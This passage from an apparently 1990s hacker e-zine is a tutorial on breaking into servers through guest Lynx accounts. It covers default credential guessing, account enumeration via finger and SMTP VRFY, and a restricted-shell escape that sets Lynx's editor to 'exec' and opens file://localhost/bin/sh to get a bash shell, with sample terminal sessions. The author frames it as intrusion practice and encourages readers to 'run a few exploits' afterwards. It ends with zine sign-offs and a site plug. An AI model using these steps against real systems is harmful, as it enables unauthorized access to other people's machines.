  1494. reasons. (busting root, taking a look around, etc.) You've tried telneting
  1495. to port 79, 25, and got a couple valid accounts, and have tried hopelessly
  1496. to just guess the passwords. This is not the approach to take. 
  1497.  
  1498. -----------------
  1499. Method of attack:
  1500. -----------------
  1501.  
  1502.     Throughout my experience, while trying to gain a valid account on
  1503. various servers, I've run into many that run a guest lynx account. 
  1504. The purpose of this account is just what it sounds like, it gives no access
  1505. to the server itself, but rather let's you only run lynx (a unix-based, text only,
  1506. web browser). The account is designed to be accessed by outsiders.  The most 
  1507. common lynx login's and passwords are:
  1508.  
  1509.     -lynx/lynx
  1510.     -guest/guest
  1511.     -guest/lynx
  1512.     -www/wwww
  1513.     -www/lynx
  1514.  
  1515.     Ok well I think you get the idea, be creative if one doesn's work.  
  1516. First off though, you need to make sure the account exists.  Simply telnet
  1517. to port 79, and try typing in a possible lynx account name. If it varifies it
  1518. your set.  Now if 79 isn't open, just telnet to port 25, and type
  1519. 'vrfy username'; username being the name of a guest lynx account.  This too 
  1520. will varify the account. Here's an example...
  1521.  
  1522. Finger:
  1523.  
  1524.     Trying...
  1525.     Connected to host.com
  1526.     Escape character is '^]'.
  1527.     lynx
  1528.     Login name: lynx                  In real life: Lynx Guest Account
  1529.     Directory: /home/lynx             Shell: /usr/bin/lynx
  1530.     No Plan.             
  1531.  
  1532. Smtp:
  1533.  
  1534.     Trying...
  1535.     Connected to host.com
  1536.     Escape character is '^]'.
  1537.     220 host.com ESMTP Sendmail 8.8.5/8.8.2; Fri, 3 Oct 1997 19:53:40 - 0400
  1538.     vrfy lynx
  1539.     252 <lynx@host.com> 
  1540.  
  1541. -------------------
  1542. After varification:
  1543. -------------------
  1544.  
  1545.     Now remember, a lynx guest account isn't a common thing on most 
  1546. servers, although I have seen it on quite a few.  This is just an alternate
  1547. plan of getting a shell on an otherwise, unaccessable server, if the situation
  1548. exists. If you cannot validate a guest lynx account, don't be surprised.
  1549. Next order of business is to login of course.  It should be fairly 
  1550. simple. Since it is a guest lynx account, the login and password should be
  1551. somewhat obvious, usually the password is the same as the login....
  1552.  
  1553.  
  1554. $ telnet host.com
  1555. Trying...
  1556. Connected to host.com
  1557. Escape character is '^]'.
  1558.  
  1559. Linux 2.0.29 (host.com) (ttyp0)
  1560.  
  1561.  
  1562. Welcome to Linux 2.0.29.
  1563.  
  1564. host login: lynx
  1565. Password:
  1566. Linux 2.0.29.
  1567. Last login: Fri Oct  3 17:11:59 on ttyp0 from ppp1.host.com
  1568. You have new mail.
  1569.  
  1570. ---------------
  1571. Once logged in:
  1572. ---------------
  1573.  
  1574.     Ok, your terminal should look something like this...
  1575.  
  1576. ----------------------------------------------------------------------
  1577.  
  1578.                                     Lynx
  1579.  
  1580.  
  1581.                (default page crap here)
  1582.  
  1583.  
  1584.  
  1585.      _________________________________________________________________
  1586.  
  1587. -- press space for next page --
  1588.   Arrow keys: Up and Down to move. Right to follow a link; Left to go back.
  1589.  H)elp O)ptions P)rint G)o M)ain screen Q)uit /=search [delete]=history list
  1590.                                                                    
  1591. -----------------------------------------------------------------------------
  1592.  
  1593.     Now the following trick is something I developed after several 
  1594. minutes of devising a plan to make lynx pop me into a bash shell.  Now that you
  1595. are in lynx, hit 'O' for the options menu. Ok the options menu should come up,
  1596. let's take a look at it...
  1597.  
  1598. -----------------------------------------------------------------------------
  1599.  
  1600.               Options Menu (Lynx Version 2.6)
  1601.  
  1602.      E)ditor                      : NONE
  1603.      D)ISPLAY variable            : NONE
  1604.      B)ookmark file               : lynx_bookmarks.html
  1605.      F)TP sort criteria           : By Filename
  1606.      P)ersonal mail address       : NONE
  1607.      S)earching type              : CASE INSENSITIVE
  1608.      display (C)haracter set      : ISO Latin 1
  1609.      Raw 8-bit or CJK m(O)de      : ON
  1610.      preferred document lan(G)uage: en
  1611.      preferred document c(H)arset : NONE
  1612.      V)I keys                     : OFF
  1613.      e(M)acs keys                 : OFF
  1614.      K)eypad mode                 : Numbers act as arrows
  1615.      li(N)e edit style            : Default Binding
  1616.      l(I)st directory style       : Mixed style
  1617.      sho(W) dot files             : OFF
  1618.      U)ser mode                   : Novice
  1619.      user (A)gent                 : Lynx/2.6  libwww-FM/2.14
  1620.  
  1621.   Select capital letter of option line, '>' to save, or 'r' to return to Lynx.
  1622.  
  1623. -----------------------------------------------------------------------------
  1624.  
  1625.     Notice the E)ditor option. That's what we're after. The purpose of it
  1626. is to edit the file currently open in lynx with the supplied text editor.  Lynx
  1627. usually expects you to put in something like joe, pico, vi, etc.  But we can
  1628. supply anything we want, and it will use it with the syntax:
  1629.  
  1630.     [editor] <file open in lynx>
  1631.  
  1632.     Ok, here's where we get inovative. Hit 'E' to type in an editor. 
  1633. For the editor, type: exec. Ah yes, those of experience are now starting to
  1634. nod their heads. Now hit 'shift+period key' or '>' to save the options. You 
  1635. now return to the default screen.  Next step. Hit 'g'. You will be prompted
  1636. to enter a URL. For the URL put the following:
  1637.  
  1638.     file://localhost/bin/sh
  1639.  
  1640.     If all goes according to plan, /bin/sh will open as binary garbage
  1641. in lynx. Now, normally if you hit 'e' with a default text editor set in
  1642. the options menu, it would edit /bin/sh as a text file. But thanks to our 
  1643. little exec fix, it will now exec /bin/sh. And we all know what that does:
  1644. pops us into a bash shell! Here's an example of the act in progress...
  1645.  
  1646. -----------------------------------------------------------------------------
  1647.  
  1648. ELF4≡?4 (444  ╘╘╘ΘΘΘyy╠H¼[─1─┴─┴/lib/ld-linux.so.1j5H[&mU dao   Qx")Bs|Ng8LW+ST
  1649. eP{ut!i:@%`Mb9Aq7>=.~ZGFY/<Ccrz'*w,]RhO6X?(4
  1650. p\Jf2-
  1651. v^}1#k;lK_V3$E0nyID╕"╪C&─┴± /XY5Tpµ     <xΣN╕"T╚<["bH3kyu├xP~X"¿¬Φ&(═íH"⌐÷├¼╚"▓
  1652. Φ"╣°ß┴`º
  1653. ╟╪8╬⌠┐± Σ8 Θ°├∞╕g≤°<√X"
  1654. X┬ⁿ├$├4╕6:hA"HxcO@V<ⁿ-  \#e╪"kcs8╣{y ñí (""╚"íh"⌐╕B░H&╖(J┴╦8&╒¿"┌¿"Σ¿Mεh"·°"""h
  1655. Φ&%HM/h"48"9¿╫?XE<M╕"Y(C"`&"j├ v"~Φf"hc\┬ ╚"í8"⌐X"▒"╢"╜╕"├"╟°"╠"╙x"╪X"Γ"Ωx"∩"⌡"
  1656. ·°"Φ"H"╚"8""#¿"-╚"5H"?("D>O⌠├]╪Pc╕┬Toh"w"~╚&"`┬TΦ("X& Φ$½H@│ ├T╛h"┼°"╠╪"╘&"█°"Σ
  1657. ("φ╪G"÷╪b²xWx<"x<¿╠(F*l0j98tBK\┬R├_Tº± fT┬± mT┬± y4╒± libtermcap.so.2strcpyioct
  1658. ltgetnum_DYNAMICtgotogetenv__strtol_internalfgetsmemcpymalloctgetflag__environB
  1659. C_initwritestrcattputsstrncmpstrncpyreallocPCfopenfclosetgetent_finiatexit_GLOB
  1660. AL_OFFSET_TABLE_exitUPstrchrtgetstrfreelibc.so.5__ctype_b__ctype_tolower__ctype
  1661. _toupperbzerostrcmpgetpid_xstatgetcwdgetwdstrerrorfcntl_fxstatstrrchrenvironfnm
  1662. atchgeteuidgetuidgetgidgetegidkillpgtcflowtcgetpgrptcsetattrtcsetpgrpopensigact
  1663. ionsigaddsetsigprocmaskalarmclosegetdtablesizelongjmp__setjmpsigdelsetatoiatolq
  1664. sortbcopystrncatgethostnameisattytcgetattrsys_siglistwaitpidgetpeername_lxstate
  1665. rrnoclosediropendirreaddirreadaccesschdirdupdup2execveforkgetgroupsgetppidkilll
  1666. seekpipesetgidsetuidtimesumaskunlinkgetpgrpgetrlimitsetpgidsetrlimittime__setfp
  1667. -- press space for next page --
  1668.   Arrow keys: Up and Down to move. Right to follow a link; Left to go back.
  1669. bash$  O)ptions P)rint G)o M)ain screen Q)uit /=search [delete]=history list
  1670.                         
  1671. -----------------------------------------------------------------------------
  1672.  
  1673.     If you look in the very bottom left corner you will see it! (bash$)
  1674. A simple 'clear' command will get rid of the rest of that mess. Often times the
  1675. TERM setting will be all messed up. Simply fix that by typing:
  1676.  
  1677.     TERM=vt100 export TERM
  1678.  
  1679.     And there you have it folks, a bash shell popped off of a lynx guest
  1680. account. Now feel free to look around, run a few exploits, whatever, what you
  1681. do beyond here is totally up to you. Hope you enjoyed today's little lesson, 
  1682. and I hope you get a chance to put it to work sometime. Take it easy all.
  1683.  
  1684.  
  1685. ---------[End]---------------------------------------------------------------        
  1686.                          
  1687.  
  1688.     
  1689.  
  1690. ----------------------------------------------------------------------
  1691.  
  1692.  
  1693.                         
  1694.  
  1695.                              URL OF THE MONTH
  1696.                               BBM.DYN.ML.ORG
  1697.                         Title: The Blue Box Moon
  1698.                         Author: Delphian Q
  1699.  
  1700. The Blue Box Moon, What a glorious Site. Not only does this site provide A WEALTH of 
  1701. Information but it has something to fit everyone. I have spoken to the author of this
  1702. page who is a very Moral and Respectable person. Delphain is a person That is to be
  1703. respected at all times, so if you ever see him on IRC please dont fuck with him. 
  1704. this section is especially dedicated to him. Thank you for all the help you have 
  1705. provided DelphianQ.
  1706.  
  1707.                                          SKaLaR109 NPA/97
  1708.  
  1709.                      Closing Ceremonies
  1710.                    _________________________________
  1711.  
  1712.     Well thats it for this one. I'd like to say thanks to all who
  1713. wrote, helped or annoyed me. Just like to say thanks to SKaLaR109 for not
  1714. killing me for being so late with this, and Aardwolf for reminding me
  1715. to get this thing done.
  1716.  
  1717.     So...
  1718.     
  1719.  
  1720.                        __     _       _______      __
  1721.                      /|  \  /| |    /| _____ |   /|  \
  1722.                     | |   \| | |   | | |___/ |  | |   \
  1723.                     | | |\ \ | |   | | _____/   | | |\ \
  1724.                     | | | \ \| |   | | |___/    | |  _  \
  1725.                     | | |\ \   |   | | |        | | | \  \
  1726.                     | |_| \ \__|   | |_|        | |_|\ \__\
  1727.                     |/__/  \/__/   |/__/        |/__/ \/__/
  1728.  
  1729.